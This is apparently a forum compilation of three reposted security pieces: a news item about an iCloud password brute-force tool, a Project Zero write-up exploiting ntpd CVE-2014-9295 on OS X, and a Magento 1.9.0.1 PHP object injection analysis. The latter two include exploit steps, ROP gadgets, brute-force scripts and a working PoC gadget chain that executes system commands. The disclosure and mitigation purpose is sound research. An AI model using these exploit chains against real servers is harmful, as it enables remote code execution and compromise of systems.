  19. Hacker Releases New Tool to Brute-Force Attack iCloud Passwords

Posted on January 3, 2015 by Waqas

Reports emerged of a new tool claiming the ability to successfully carry out password dictionary attacks on any iCloud account without being detected by Apple's security. It seems that the vulnerability has since been patched, and anyone trying to use this tool is now being locked out after repeated password attempts. Earlier, in September, Apple had reported that it had already patched one hole that allowed brute-force attacks like these.

The tool's source code, released on GitHub, showed nothing extremely advanced. It simply tries every word in its given 500-word list as the password of any iCloud account email. Judging from its source code, the tool is unlikely to succeed at cracking most passwords: passwords that are not in its 500-word dictionary are safe. Still, it posed a risk, as many people do use simple dictionary words as their iCloud passwords, and while this tool was crude, more seasoned attackers could extend it with a much larger word list.

Apple appears to have resolved the hack, which simply relied on pretending to be an iPhone device. What is surprising is the fact that Apple allowed indefinite requests instead of locking the account after a certain number of attempts. At the same time this was happening, the Photos app for iCloud was pulled, and it is not yet clear whether there is a connection between the two stories.

Sursa: http://hackread.com/brute-force-attack-icloud-passwords/
  20. Finding and exploiting ntpd vulnerabilities

Posted by Stephen Röttger, Time Lord

[Foreword by Chris Evans: this post by Stephen represents the first Project Zero guest blog post. From time to time, we'll be featuring guest blog posts for top-tier security research. In this instance, we've been impressed by the remotely exploitable nature of these vulnerabilities, as well as the clever chain of bugs and quirks that eventually leads to remote code execution. You've probably seen the recent ntpd vulnerability disclosures and this blog post tells the story from one of the researchers who discovered the issues. Over to Stephen…]

A few months ago I decided to get started on fuzzing. I chose the reference implementation of the Network Time Protocol (NTP), ntpd, as my first target, since I have some background with NTP and the protocol seemed simple enough to be a good learning experience. Also, ntpd is available for many platforms and widely in use, including being part of the default OS X installation. While looking at the source to get a better understanding of the protocol, I noticed that its processing is far more complex than I expected. Besides the time synchronization packets, ntpd supports symmetric and asymmetric (Autokey) authentication and so-called private and control mode packets that let you query the daemon for stats or perform configuration changes (if I'm not mistaken, this is the protocol spoken by ntpdc and ntpq respectively). I quickly stumbled over a bug in the code processing Autokey protocol messages and decided to dig deeper and perform a manual code review of the other parts as well. This resulted in finding CVE-2014-9295 and writing my first ever OS X exploit, for which I will present a write-up today.

tl;dr: a global buffer overflow can be triggered on common configurations by an attacker on the local network through an IPv6 packet with a spoofed ::1 source.
If your ntpd is not patched yet, add nomodify or noquery to every restrict line in your config, even the ones for localhost. But enough of that, let's jump into the details.

The Bug

The most severe bug, which turned out to be exploitable on OS X Mavericks, is a buffer overflow in the code that handles control packets. Control mode responses are fragmented if they exceed the size of the buffer used to store them, as implemented in the following function:

    static void
    ctl_putdata(
        const char *dp,
        unsigned int dlen,
        int bin         /* set to 1 when data is binary */
        )
    {
        //[...]
        /*
         * Save room for trailing junk
         */
        if (dlen + overhead + datapt > dataend) {
            /*
             * Not enough room in this one, flush it out.
             */
            ctl_flushpkt(CTL_MORE);
        }

        memmove((char *)datapt, dp, (unsigned)dlen);

        datapt += dlen;
        datalinelen += dlen;
    }

As you can see, if the data to be written doesn't fit into the remaining buffer space, <ctl_flushpkt> is called, which will send out the current packet and reset the datapt to point to the beginning of the buffer. However, memmove will be called in any case, and if dlen is bigger than the total buffer size it will overflow the buffer. Note that the overflow happens in a global buffer and thus stack cookies won't help in this case.

So let's see if we can find a code path that will trigger this. In most invocations, the data to be written comes from a fixed-size buffer that is smaller than the output buffer and thus won't overflow. The function <configure>, which handles ntp.conf-style remote configurations sent by a privileged client, will send any error messages back to the client using <ctl_putdata>. By sending a configuration with enough errors, the error message string will exceed the buffer size. However, the fact that the written data is restricted to a fixed set of error messages makes exploitation difficult. A more powerful overwrite can be found in <read_variables>.
The NTP daemon keeps a list of name=value variables that can be set through the configuration and read back with a control mode packet. If a variable bigger than the output buffer is read back, it will overflow and corrupt whatever is stored behind the buffer.

Setting Variables

So how can we set variables? As mentioned before, there is a control mode packet through which we can send configuration commands to ntpd and thereby set any variable we want. But this is obviously a privileged operation and protected by two mechanisms:

1. Access to private and control mode queries can be restricted in ntp.conf based on the source IP. Default installations usually prohibit these queries for every source IP except for 127.0.0.1 and ::1. This is what e.g. Ubuntu, Debian and OS X do.
2. The packet needs to be authenticated with a MAC, for which the shared key has to be specified in ntp.conf, which again shouldn't be set on default installations.

Bypassing the first one is actually not that hard if you're on the same network. As we all know, IP addresses can be spoofed. But can we spoof the address of localhost? It turns out OS X and the Linux kernel behave similarly in this case. Any IP packet arriving on an external interface with the source IP 127.0.0.1 will be dropped immediately. But if we use IPv6 instead, we can actually spoof ::1 and send control mode packets to the daemon (some Linux distributions have firewall rules in place that protect against this, e.g. Red Hat). Thus, if we are on the same local network, we can send spoofed packets to the link-local address of the target and bypass the IP restrictions.

But what about requirement number 2? This one sounds tough: how can you have a valid MAC if no key is specified?

Quest for the Key

Let's back up and discuss a little bit of background first. Through ntp.conf you can specify multiple keys and assign key ids to them.
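For reference, the control packets discussed above are NTP mode 6 messages. A sketch of packing the fixed 12-byte header (layout per RFC 1305 Appendix B) might look like the following; actually delivering it with a spoofed ::1 source would additionally require raw IPv6 sockets and is out of scope here.

```python
import struct

def ntp_control_header(opcode=2, sequence=1, version=2):
    """Pack the fixed 12-byte NTP control message header (mode 6), per
    RFC 1305 Appendix B: LI/VN/Mode byte, R/E/M/opcode byte, then 16-bit
    sequence, status, association id, offset and count fields."""
    li_vn_mode = (0 << 6) | (version << 3) | 6   # leap 0, mode 6 = control
    rem_op = opcode & 0x1f                       # request: R/E/M bits clear
    return struct.pack('>BBHHHHH', li_vn_mode, rem_op, sequence, 0, 0, 0, 0)
```

Opcode 2 corresponds to reading variables; payload data and the MAC would be appended after this header.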
These key ids can then be assigned to different roles, i.e. a requestkey is used to authenticate private mode packets and a controlkey is used for control mode packets. We need a controlkey to send our configuration requests, but a requestkey would actually suffice, since a private mode packet exists that will set the controlkey id to a specified value. And that's where another bug comes into play, discovered by Neel Mehta. Let's take a look at what ntpd does if no requestkey was specified in the config:

    /* if doesn't exist, make up one at random */
    if (authhavekey(req_keyid)) {
        //[...]
    } else {
        unsigned int rankey;

        rankey = ntp_random();
        req_keytype = NID_md5;
        req_hashlen = 16;
        MD5auth_setkey(req_keyid, req_keytype,
                       (u_char *)&rankey, sizeof(rankey));
        authtrust(req_keyid, 1);
    }

That's right: if no key was specified, a random 31-bit key will be generated, which means we can brute force it by sending 2^31 packets to the vulnerable daemon with a 68-byte payload each.

But wait, there's more! The random key is created by a custom random number generator implementation that is seeded with a 32-bit value, and we can get the output of this generator through standard time synchronization requests. Part of the receive timestamp that we get by querying the time from the daemon is a random value from this generator, and each query allows us to recover around 12 bits of the output, which we can use to brute force the seed offline. However, the feasibility of a naive brute force approach highly depends on the uptime of ntpd, since the number of random values that have been created will increase the search space. To give an idea of the time complexity, my single-core implementation takes a few hours on my laptop even if I limit the search space to the first 1024 random values, but you can throw more cores at the problem or precompute as much as possible and build a lookup table.
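The 2^31 key search can be sketched as below. The MAC construction (MD5 over the raw key bytes followed by the packet) and the little-endian key byte order are assumptions made for illustration, not a verified reimplementation of ntpd's authentication.

```python
import hashlib
import struct

def brute_force_request_key(message, mac, max_key=2**31):
    """Try every possible 31-bit value for the auto-generated requestkey
    until the candidate key reproduces the packet's MAC."""
    for candidate in range(max_key):
        key = struct.pack('<I', candidate)   # rankey stored as a raw int
        if hashlib.md5(key + message).digest() == mac:
            return candidate
    return None
```

In practice one would of course distribute the range across cores, or avoid the search entirely by recovering the generator seed offline as described above.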
At this point, we have an overflow in a global buffer that can be triggered remotely on standard configurations. Neat!

The Overflow

Now that we have the key, we can send configuration commands and write arbitrary variables. When reading them back from the daemon, you can optionally specify the variables that you're interested in. ntpd will iterate through them, write them (separated by a comma) to the global buffer through the function <ctl_putdata> and finally flush them out with <ctl_flushpkt>. There are still some restrictions on this overflow that make exploitation notably harder:

- We can't write 0x00, 0x22 (") and 0xff.
- Some data will be appended after our overwrite. That is, ", " between two variable writes and "\r\n" on the final flush.

How to proceed from here depends on which OS/distribution/architecture you target, since protection mechanisms and the memory layout of the global data structures will differ. A few examples:

- On x64, the inability to write null bytes prevents us from completely overwriting pointers, since the most significant bytes are null bytes. This poses a problem since "\r\n" is appended to our data, which will limit the control over partial pointer overwrites. On x86, however, this shouldn't be an issue.
- At least on Debian, some compile-time protections are not enabled for ntpd. I.e. the executable is not position independent and the global offset table (GOT) is writable during runtime.
- On OS X Mavericks, the datapt variable, which points to the current position in the buffer, is located after the buffer itself, while on Debian and Ubuntu the pointer is in front of the buffer and can't be overwritten.

I chose to try my luck on a 64-bit OS X Mavericks. Since I have no prior experience with OS X, please bear with me if I missed something obvious or use the wrong nomenclature. The environment looks like this:

- The binary, stack, heap and shared libraries are individually randomized with 16 bits of entropy.
- The address of the shared libraries is randomized at boot time.
- On a crash, ntpd is restarted automatically with approximately 10 seconds delay.
- ntpd is compiled with stack cookies (which doesn't matter in our case since we overflow a global buffer).
- The global offset table (GOT) is writable during runtime.

For a reliable exploit we will have to bypass ASLR somehow, so let's leak some pointers. This one is actually quite easy, since the datapt variable, which as you might remember points to the current write location, is located after the buffer itself: we just have to overwrite the two least significant bytes of the datapt variable and, as a consequence, ntpd will miscalculate the length and send us data after the buffer, which leaks a pointer into the ntpd binary as well as a heap pointer. After that, the datapt variable is conveniently reset to point to the beginning of the buffer again. Note that usually "\r\n" would get appended to our data and corrupt the partial pointer overwrite. But since we overwrite the write pointer itself, the newline sequence will be written to the new destination instead.

With the same trick, we can turn the bug into a slightly restricted write-what-where primitive: partially overwrite the datapt variable to point to where you want to write (minus a few bytes to make room for the separator) and then write arbitrary data with a second ntpd variable. Again, the fact that garbage is appended to our data is no issue for the first write, since it will be written to the new location instead and won't corrupt the pointer. Note that we can only write arbitrary data in front of the buffer, since a higher address will trigger a flush and reset the datapt (after writing the separator, so this might still be used to corrupt a length field).

Unfortunately, the appended bytes still pose a problem. If we try to do a partial pointer overwrite through this, the "\r\n" sequence will always corrupt the pointer before it is used. Well, almost always.
The GOT, and this took me way too long to figure out, is actually writable and used twice before our overwrite gets corrupted by the addition of "\r\n". Between writing a variable and flushing the packet, <strlen> and <free> are called. That means, if we partially overwrite the GOT entry of either of those functions, the pointer will be used before it gets corrupted and we control rip.

Info leak, again

Since we know the base address of the binary and can overwrite GOT entries, we can just find a nice gadget in the binary and jump to it, right? Unfortunately, that doesn't work. To see why, let's take a look at a couple of example addresses from the binary and libsystem_c:

    0x000000010641c000  /usr/sbin/ntpd
    0x00007fff88791000  /usr/lib/system/libsystem_c.dylib

The addresses of system libraries have two null bytes as their most significant bytes, while the binary address starts with three null bytes. Thus, if we overwrite the GOT entry of <strlen> with an address from the binary, there will still be a 0x7f byte left from the library address (remember: we can't write nul bytes). To obtain the address of a system library we could try to turn our overwrite into a better leak, e.g. by overwriting some length field. But there is a lazier approach due to a weakness of ASLR on OS X Mavericks. The most common libraries are loaded in the split library region (as "man vmmap" calls it), which is shared by all processes in the system. The load address of this region is randomized during boot. This means that the addresses stay the same if a program is restarted and that even libraries which are not used by the program are loaded in its address space and can be used for ROP gadgets. This, and the fact that ntpd is restarted automatically when it crashes, makes it possible to brute force the library addresses of <strlen> (libsystem_c) or <free> (libsystem_malloc) bytewise.
If you reboot your system a few times, you can observe that the load address of the split library region is always of the form 0x00007fff8XXXX000, providing 16 bits of entropy, or 17 bits in our case since the region can extend to 0x00007fff9XXXX000.

Let's use the libsystem_c address from the example before: 0x00007fff88791000. We know that <strlen> is located at offset 0x1720 and thus 0x00007fff88792720 is the address we're trying to brute force. We start by brute forcing the upper 4 bits of the second least significant byte. We overwrite the GOT entry of <strlen> with 0x0720, resulting in the new entry 0x00007fff88790720. Since we didn't hit the correct address, ntpd will crash and won't send us any replies anymore. In that case, we increment the address to 0x1720 and try again. If ntpd does send us a reply, which will happen at 0x2720, we know that we found the correct byte and continue with the next one (0x012720). This way, we can recover the libsystem_c address in 304 tries (4 bit + 8 bit + 5 bit) in the worst case. OS X will restart ntpd approximately every 10 seconds, but you will need to brute force the key anew for every try, so bring your supercomputer. Also, if you're unlucky you will run into an endless loop and ntpd has to be killed manually.

Arbitrary Code Execution

If it wasn't for the fact that ntpd runs in a sandbox, we would be finished now. Just overwrite the GOT entry of <strlen> with the address of <system> and execute arbitrary commands, since it will get called with a user-controlled string. But all you get out of this is the following line in /var/log/system.log:

    sandboxd[405] ([41]): ntpd(41) deny process-exec /bin/sh

Instead, we need to find a nice gadget to control the stack pointer and make it point to a ROP chain. The usual way to do this would be a stack pivot, but the data we control on the stack is limited. On the stack, we control data in 3 locations which we can fill with arbitrary pointers, this time without any restrictions.
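The bytewise brute force described earlier can be simulated offline to sanity-check the worst case of 304 tries. The oracle below stands in for "did ntpd still answer after the partial GOT overwrite", and the address and the known low bits are made up for illustration.

```python
SECRET = 0x00007fff88792720          # the strlen address we pretend not to know

def oracle(partial, known_bits):
    """True iff the overwritten low bits match the real address."""
    mask = (1 << known_bits) - 1
    return (partial & mask) == (SECRET & mask)

def recover_address():
    addr = SECRET & 0xfff            # low 12 bits assumed known (offset 0x720)
    bits = 12
    tries = 0
    for chunk in (4, 8, 5):          # 4 + 8 + 5 bits: at most 16+256+32 = 304 tries
        for guess in range(1 << chunk):
            tries += 1
            candidate = addr | (guess << bits)
            if oracle(candidate, bits + chunk):
                addr = candidate
                break
        bits += chunk
    # the fixed high bits of the split library region (0x00007fff8XXXX000)
    return 0x00007fff80000000 | addr, tries
```

Against the real daemon each "try" additionally costs a fresh key brute force, which is what makes the attack expensive in practice.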
Besides that, we completely control the contents of a global buffer at a known address in the binary, and if we can get the stack pointer (rsp) to point to this buffer we can execute an arbitrary ROP chain. Since our exploit overwrites the GOT, we only control the instruction pointer once, i.e. we can't chain multiple calls. Thus, our first gadget needs to increment the stack pointer by either 0x80, 0x90 or 0xb8, so that it will use one of our addresses on return and do something useful at the same time. Fortunately, I found the following gadget in libsystem_c.dylib:

    add rsp, 0x88
    pop rbx
    pop r12
    pop r13
    pop r14
    pop r15
    pop rbp
    ret

This gadget returns to our address at rsp+0xb8 and at the same time loads the value from rsp+0x90 into r12. Since we now control a register, we can chain gadgets that end in a call qword [reg+n], where reg points to the global buffer that we control. For example, the second gadget looks like this:

    mov rdi, r12
    mov rsi, r14
    mov rdx, r13
    call qword [r12+0x10]

With a few gadgets of this kind, we control rsi and can load it into rsp:

    push rsi
    pop rsp
    xor eax, eax
    pop rbp
    ret

And with that, we're done. This will crash on a ret instruction with rsp pointing to user-controlled data, and thus arbitrary code execution is straightforward. Since we control the stack, we can build a ROP chain that loads and executes shellcode and from there try to break out of the sandbox by attacking the kernel or IPC channels. But that is left as an exercise for the reader.

Exploit Summary

1. Send a bunch of regular time synchronization requests to leak random values.
2. Brute force the seed and calculate the requestkey (which has the keyid 65535).
3. Send a private mode packet signed with the requestkey and with a spoofed source IP of ::1 to the server to set the controlkey id to 65535.
4. Send a configuration change to lift all restrictions for our IP address.
5. Add our IP to get async notifications (we have to do this, since we later overwrite a flag that controls whether responses are sent directly or asynchronously).
6. Trigger the overflow by setting a long variable and reading it back, and leak the binary base address.
7. Use the overflow again as a write-what-where primitive to brute force the address of <strlen> bytewise.
8. Prepare the data on the stack and in the global buffer.
9. Call the gadgets to control rsp and execute a ROP chain.

Mitigation

In case your ntpd is not patched yet, these bugs can be effectively protected against through changes in your ntp.conf. The vulnerable <ctl_putdata> function is used by the processing of control mode packets, and this can be blocked completely by adding "noquery" to every restrict line in the configuration. As explained before, it is important to also add "noquery" to the restrict lines for localhost, since the IP-based access restrictions can often be bypassed through spoofing. But note that this will prevent ntpq from working and you won't be able to query for peer information and other stats anymore.

For example, if your configuration includes multiple "restrict" lines:

    restrict default kod nomodify notrap nopeer noquery
    restrict -6 default kod nomodify notrap nopeer noquery
    restrict 127.0.0.1
    restrict -6 ::1

make sure that "noquery" is included in all of those:

    restrict default kod nomodify notrap nopeer noquery
    restrict -6 default kod nomodify notrap nopeer noquery
    restrict 127.0.0.1 noquery
    restrict -6 ::1 noquery

Posted by Chris Evans at 4:28 AM

Sursa: Project Zero: Finding and exploiting ntpd vulnerabilities
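The ntp.conf mitigation described in the post above is mechanical enough to script. This is a quick, unofficial sketch that appends "noquery" to every restrict line missing it; it deliberately leaves all other lines untouched.

```python
def harden_ntp_conf(text):
    """Append 'noquery' to every 'restrict' line of an ntp.conf that does
    not already carry it, including the localhost lines."""
    hardened = []
    for line in text.splitlines():
        if line.strip().startswith('restrict') and 'noquery' not in line:
            line = line.rstrip() + ' noquery'
        hardened.append(line)
    return '\n'.join(hardened)
```

Run it over the file contents, review the diff, and reload ntpd; remember that ntpq queries stop working afterwards.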
  21. Magento 1.9.0.1 PHP Object Injection

Recently, I found a PHP Object Injection (POI) vulnerability in the administrator interface of Magento 1.9.0.1. Magento is an e-commerce software written in PHP that was acquired by eBay Inc. A bug bounty program is run that offers a $10,000 bounty for remote code execution bugs. A POI vulnerability can lead to such a remote code execution, depending on the gadget chains the attacker is able to trigger.

Sadly, I stopped investigating the POI vulnerability and resumed 1 week later – a fatal error. When I continued investigating exploitable gadget chains, Magento had pushed an update in the meantime that patches several security issues. The POI is not mentioned anywhere, but it is fixed by replacing the affected unserialize() call with json_decode(). So no bug bounty, but the exploitation is still worth a look, because it includes a hash verification bypass and a cool gadget that allowed full code coverage in gadget chaining. In the end, an attacker can execute arbitrary code on the targeted server. However, administrator privileges are required.

1. PHP Object Injection

In Magento 1.9.0.1, the method tunnelAction() of the administrator's DashboardController is affected by a POI vulnerability. It deserializes user data supplied in the ga parameter.

    // app/code/core/Mage/Adminhtml/controllers/DashboardController.php
    public function tunnelAction()
    {
        $gaData = $this->getRequest()->getParam('ga');
        $gaHash = $this->getRequest()->getParam('h');
        if ($gaData && $gaHash) {
            $newHash = Mage::helper('adminhtml/dashboard_data')->getChartDataHash($gaData);
            if ($newHash == $gaHash) {
                if ($params = unserialize(base64_decode(urldecode($gaData)))) {

A closer look reveals, however, that the base64-encoded, serialized data is protected from manipulation with a hash.
The hash of the gaData is generated with the method getChartDataHash() and is then compared to the hash supplied in the h parameter. Only if both hashes match is the data deserialized. Let's get some sample data. The tunnelAction() is triggered when the dashboard graph is loaded.

    // app/design/adminhtml/default/default/template/dashboard/graph.phtml
    <img src="<?php echo $this->getChartUrl(false) ?>

Here, the method getChartUrl() serializes graph parameters and creates the gaHash of the base64-encoded gaData.

    // app/code/core/Mage/Adminhtml/Block/Dashboard/Graph.php
    function getChartUrl()
    {
        ...
        $gaData = urlencode(base64_encode(serialize($params)));
        $gaHash = Mage::helper('adminhtml/dashboard_data')->getChartDataHash($gaData);
        $params = array('ga' => $gaData, 'h' => $gaHash);
        return $this->getUrl('*/*/tunnel', array('_query' => $params));
    }

The following request is generated and can be intercepted:

    1  /index.php/admin/dashboard/tunnel/key/803e506c399449c72975fc1fcc2c0435/
    2  ?ga=eyJjaHQiOiJsYyIsImNoZiI6ImJnLHMsZjRmNGY0fGMsbGcsOTAsZmZmZmZmLDAuMSxlZGVkZWQsMCIsImNobSI6IkIsZjRkNGIyLDAsMCwwIiwiY2hjbyI6ImRiNDgxNCIsImNoZCI6ImU6IiwiY2h4dCI6IngseSIsImNoeGwiOiIwOnx8fDk6MDAgdm9ybS58fHwxMjowMCBuYWNobS58fHwzOjAwIG5hY2htLnx8fDY6MDAgbmFjaG0ufHx8OTowMCBuYWNobS58fHwxMjowMCB2b3JtLnx8fDM6MDAgdm9ybS58fHw2OjAwIHZvcm0ufDE6fDB8MSIsImNocyI6IjU4N3gzMDAiLCJjaGciOiI0LjM0NzgyNjA4Njk1NjUsMTAwLDEsMCJ9
    3  &h=61f3757d04b665baac6f8176a2012337

We can base64-decode the data in the ga parameter (line 2) and modify the serialized parameters in order to exploit the PHP Object Injection vulnerability. However, we then have to generate a valid hash for our malformed data and replace the hash in the h parameter (line 3) with it.
Otherwise, our manipulated data is not deserialized.

2. Hash Verification

Let's have a look at how the hash is generated and whether we can forge it for manipulated data. The hash is created in the getChartDataHash() method by calculating the MD5 hash of the base64-encoded data concatenated with a secret. If we know this secret, we can generate our own hash for our modified gaData.

    // app/code/core/Mage/Adminhtml/Helper/Dashboard/Data.php
    public function getChartDataHash($data)
    {
        $secret = (string)Mage::getConfig()->getNode(Mage_Core_Model_App::XML_PATH_INSTALL_DATE);
        return md5($data . $secret);
    }

Luckily, the secret is cryptographically very weak. As the constant's name suggests, the config value XML_PATH_INSTALL_DATE refers to the date of the Magento installation in RFC 2822 format. For example, the secret date could look like the following:

    Sat, 1 Nov 2014 21:08:46 +0000

Assuming that the installation was performed a maximum of 1 year ago, there are fewer than 31 * 12 * 24*60*60 = 32 million possibilities. We can take the intercepted sample data to brute force the secret date locally. Furthermore, we can narrow down the possible date window by observing the HTTP response headers of the targeted web server. For example, the HTTP response for a request of the favicon file tells us its last modification date:

    Request:
    GET /favicon.ico HTTP/1.0

    Response:
    If-Modified-Since: Wed, 05 Nov 2014 09:06:45 GMT

This should equal the exact date when the installation files were copied to the server. We can then assume that the installation was performed at least within the same month this file was extracted. It also tells us the timezone (here GMT) used by the server.
This leaves us with only 30 * 24*60*60 = 2.6 million possibilities, which can be brute forced within a few seconds.

    $gaData = 'eyJjaHQiOiJsYyIsImNoZiI6ImJnLHMsZjRmNGY0fGMsbGcsOTAsZmZmZmZmLDAuMSxlZGVkZWQsMCIsImNobSI6IkIsZjRkNGIyLDAsMCwwIiwiY2hjbyI6ImRiNDgxNCIsImNoZCI6ImU6IiwiY2h4dCI6IngseSIsImNoeGwiOiIwOnx8fDk6MDAgdm9ybS58fHwxMjowMCBuYWNobS58fHwzOjAwIG5hY2htLnx8fDY6MDAgbmFjaG0ufHx8OTowMCBuYWNobS58fHwxMjowMCB2b3JtLnx8fDM6MDAgdm9ybS58fHw2OjAwIHZvcm0ufDE6fDB8MSIsImNocyI6IjU4N3gzMDAiLCJjaGciOiI0LjM0NzgyNjA4Njk1NjUsMTAwLDEsMCJ9';
    $hash = '61f3757d04b665baac6f8176a2012337';
    date_default_timezone_set('GMT');
    // Wed, 05 Nov 2014 09:06:45 GMT
    $timestamp = mktime(9, 6, 45, 11, 5, 2014);
    $today = time();
    for ($i = 0; $i < 2592000 && $timestamp < $today; $i++) {
        $secret = date(DATE_RFC2822, $timestamp++);
        if (md5($gaData . $secret) === $hash) {
            echo $secret;
            break;
        }
    }

Once we have obtained the secret, we can alter the serialized data and create a valid hash for it, so that our data is deserialized by the server. That means we can inject arbitrary objects into the application and trigger gadget chains by invoking the objects' magic methods (for more details please refer to our paper).

3. Gadget Chain

Magento's code base is huge and many interesting initial gadgets (magic methods) can be found that trigger further gadgets (methods). For example, the usual file deletion and file permission modification calls can be triggered in order to delete files. This is partly interesting in Magento because the deletion of the /app/.htaccess file allows access to the /app/etc/local.xml file, which contains the crypto key. However, since we already have administrative privileges, we are interested in more severe vulnerabilities. It turns out that the included (and autoloaded) Varien library provides all the gadgets we need to execute arbitrary code on the server.
The deprecated class Varien_File_Uploader_Image provides a destructor as our initial gadget that allows us to jump to arbitrary clean() methods.

[TABLE]
[TR]
[TD=class: gutter]356 357 358 359 360[/TD]
[TD=class: code]// lib/Varien/File/Uploader/Image.php:357
function __destruct()
{
    $this->uploader->Clean();
}[/TD]
[/TR]
[/TABLE]

This way, we can jump to the clean() method of the class Varien_Cache_Backend_Database. It fetches a database adapter from the property _adapter and executes a TRUNCATE TABLE query with its query() method. The table name can be controlled by the attacker by setting the property _options[‘data_table’].

[TABLE]
[TR]
[TD=class: gutter]249 250 251 252 253 254 255 256 257 258 259 260 261[/TD]
[TD=class: code]// lib/Varien/Cache/Backend/Database.php
public function clean($mode = Zend_Cache::CLEANING_MODE_ALL, $tags = array())
{
    $adapter = $this->_adapter;
    switch($mode) {
        case Zend_Cache::CLEANING_MODE_ALL:
            if ($this->_options['store_data']) {
                $result = $adapter->query('TRUNCATE TABLE '.$this->_options['data_table']);
            }
        ...
    }
}[/TD]
[/TR]
[/TABLE]

If we provide the Varien_Db_Adapter_Pdo_Mysql as database adapter, its query() method passes the query along to the very interesting method _prepareQuery() before the query is executed.

[TABLE]
[TR]
[TD=class: gutter]421 422 423 424 425 426 427 428 429 430 431 432[/TD]
[TD=class: code]// lib/Varien/Db/Adapter/Pdo/Mysql.php
public function query($sql, $bind = array())
{
    try {
        $this->_checkDdlTransaction($sql);
        $this->_prepareQuery($sql, $bind);
        $result = parent::query($sql, $bind);
    } catch (Exception $e) {
        ...
    }
}
[/TD]
[/TR]
[/TABLE]

The _prepareQuery() method uses the _queryHook property for reflection. Not only the method name is reflected, but also the receiving object. This allows us to call any method of any class in the Magento code base with control of the first argument – a really cool gadget found by the new RIPS prototype.
[TABLE]
[TR]
[TD=class: gutter]463 464 465 466 467 468 469 470 471 472 473 474[/TD]
[TD=class: code]// lib/Varien/Db/Adapter/Pdo/Mysql.php
protected function _prepareQuery(&$sql, &$bind = array())
{
    ...
    // Special query hook
    if ($this->_queryHook) {
        $object = $this->_queryHook['object'];
        $method = $this->_queryHook['method'];
        $object->$method($sql, $bind);
    }
}
[/TD]
[/TR]
[/TABLE]

From here it wasn’t hard to find a critical method that operates on its properties or its first parameter. For example, we can jump to the filter() method of the Varien_Filter_Template_Simple class. Here, the regular expression of a preg_replace() call is built dynamically with the properties _startTag and _endTag that we control. More importantly, the dangerous eval modifier is already appended to the regular expression, which leads to the execution of the second preg_replace() argument as PHP code.

[TABLE]
[TR]
[TD=class: gutter]39 40 41 42 43 44 45[/TD]
[TD=class: code]// lib/Varien/Filter/Template/Simple.php
public function filter($value)
{
    return preg_replace('#'.$this->_startTag.'(.*?)'.$this->_endTag.'#e',
        '$this->getData("$1")', $value);
}
[/TD]
[/TR]
[/TABLE]

In the executed PHP code of the second preg_replace() argument, the match of the first group is used ($1). Important to note are the double quotes, which allow us to execute arbitrary PHP code by using curly brace syntax.

4. Exploit

Now we can put everything together. We inject a Varien_File_Uploader_Image object that will invoke the class’ destructor. In the uploader property we create a Varien_Cache_Backend_Database object, in order to invoke its clean() method. We point the object’s _adapter property to a Varien_Db_Adapter_Pdo_Mysql object, so that its query() method also triggers the valuable _prepareQuery() method.
In the _options[‘data_table’] property, we can specify our PHP code payload, for example:

[TABLE]
[TR]
[TD=class: gutter]1[/TD]
[TD=class: code]{${system(id)}}RIPS[/TD]
[/TR]
[/TABLE]

We also append the string RIPS as a delimiter. Then we point the _queryHook property of the Varien_Db_Adapter_Pdo_Mysql object to a Varien_Filter_Template_Simple object and its filter method. This method will be called via reflection and receives the following argument:

[TABLE]
[TR]
[TD=class: gutter]1[/TD]
[TD=class: code]TRUNCATE TABLE {${system(id)}}RIPS[/TD]
[/TR]
[/TABLE]

If we now set the Varien_Filter_Template_Simple object’s property _startTag to TRUNCATE TABLE and the property _endTag to RIPS, the first match group of the regular expression in the preg_replace() call will be our PHP code. Thus, the following PHP code will be executed:

[TABLE]
[TR]
[TD=class: gutter]1[/TD]
[TD=class: code]$this->getData("{${system(id)}}")[/TD]
[/TR]
[/TABLE]

In order to resolve the variable's name, the system() call is evaluated within the curly-brace syntax. This leads to the execution of arbitrary PHP code or system commands.
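Once the secret install date is recovered, forging a valid hash for an arbitrary payload is just MD5 over the base64 blob concatenated with the secret. A minimal Python sketch of that forging step (the payload and secret below are placeholder values for illustration, not a working gadget chain):

```python
import base64
import hashlib

# Placeholder values: the real payload would be the serialized PHP
# gadget chain, and the real secret is the target's install date.
payload = b'O:8:"SomeObj":0:{}'             # illustrative serialized PHP object
secret = b'Sat, 1 Nov 2014 21:08:46 +0000'  # recovered install date

b64 = base64.b64encode(payload)

# Mirror Magento's check: md5(base64_data . secret)
h = hashlib.md5(b64 + secret).hexdigest()

print('?ga=' + b64.decode() + '&h=' + h)
```

Any 32-character hex digest produced this way will pass the getChartDataHash() comparison for the chosen payload, which is why recovering the install date is the only real obstacle.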
PoC:

[TABLE]
[TR]
[TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43[/TD]
[TD=class: code]class Zend_Db_Profiler
{
    protected $_enabled = false;
}

class Varien_Filter_Template_Simple
{
    protected $_startTag;
    protected $_endTag;
    public function __construct()
    {
        $this->_startTag = 'TRUNCATE TABLE ';
        $this->_endTag = 'RIPS';
    }
}

class Varien_Db_Adapter_Pdo_Mysql
{
    protected $_transactionLevel = 0;
    protected $_queryHook;
    protected $_profiler;
    public function __construct()
    {
        $this->_queryHook = array();
        $this->_queryHook['object'] = new Varien_Filter_Template_Simple;
        $this->_queryHook['method'] = 'filter';
        $this->_profiler = new Zend_Db_Profiler;
    }
}

class Varien_Cache_Backend_Database
{
    protected $_options;
    protected $_adapter;
    public function __construct()
    {
        $this->_adapter = new Varien_Db_Adapter_Pdo_Mysql;
        $this->_options['data_table'] = '{${system(id)}}RIPS';
        $this->_options['store_data'] = true;
    }
}

class Varien_File_Uploader_Image
{
    public $uploader;
    public function __construct()
    {
        $this->uploader = new Varien_Cache_Backend_Database;
    }
}

$obj = new Varien_File_Uploader_Image;
$b64 = base64_encode(serialize($obj));
$secret = 'Sat, 1 Nov 2014 21:08:46 +0000';
$hash = md5($b64 . $secret);
echo '?ga='.$b64.'&h='.$hash;[/TD]
[/TR]
[/TABLE]

The POI was straightforward, but we had to circumvent a hash verification first and find nice gadgets. A reflection injection allowed us to trigger almost arbitrary gadget chains through the entire code base, which in the end allowed remote code execution. In the next post we will have a look at another POI I played with lately, but triggering the POI itself will be more tricky. Sursa: https://websec.wordpress.com/2014/12/08/magento-1-9-0-1-poi/
